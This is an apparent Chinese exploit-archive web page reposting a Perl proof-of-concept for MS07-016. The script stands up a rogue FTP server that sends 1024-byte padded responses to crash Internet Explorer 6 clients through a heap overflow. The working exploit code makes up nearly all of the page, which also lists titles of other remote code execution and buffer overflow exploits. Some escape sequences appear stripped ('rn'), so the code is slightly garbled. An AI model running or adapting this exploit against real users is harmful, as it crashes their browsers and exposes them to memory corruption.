手机
当前位置:查字典教程网 >网络安全 >Exploit >MS Internet Explorer (FTP Server Response) DoS Exploit
MS Internet Explorer (FTP Server Response) DoS Exploit
摘要:#!/usr/bin/perl#MS07-016FTPServerResponsePoC#Usage:./ms07016ftp.pl[LIS...

#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC

# Usage: ./ms07016ftp.pl [LISTEN_IP]

#

# Tested Against: MSIE 6.02900.2180 (SP2)

#

# Details: The response is broken into buffers, either at length 1024,

# or at 'rn'. Each buffer is apended with x00, without

# bounds checking. If the response is exctly 1024 characters

# in length, you will overflow the heap with the string x00.

use IO::Socket;

use strict;

# Create listener

my $ip=shift || '127.0.0.1';

my $sock = IO::Socket::INET->new(Listen=>1,

LocalHost=>$ip,

LocalPort=>'21',

Proto=>'tcp');

$sock or die ("Could not create listener.nMake sure no FTP server is running, and you are running this as root.n");

# Wait for initial connection and send banner

my $sock_in = $sock->accept();

print $sock_in "220 waa waa wee waarn";

# Send response code with total lenght of response = 1024

while (<$sock_in>){

my $response;

if($_ eq "USER") { $response="331 ";}

elsif($_ eq "PASS") { $response="230 ";}

elsif($_ eq "syst") { $response="215 ";}

elsif($_ eq "CWD") { $response="250 ";}

elsif($_ eq "PWD") { $response="230 ";}

else { $response="200 ";}

print $sock_in $response."A"x(1024-length($response)-2)."rn";

}

close($sock);

//http://www.heibai.net

【MS Internet Explorer (FTP Server Response) DoS Exploit】相关文章:

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

MS Internet Explorer Recordset Double Free Memory Exploit

精品推荐
分类导航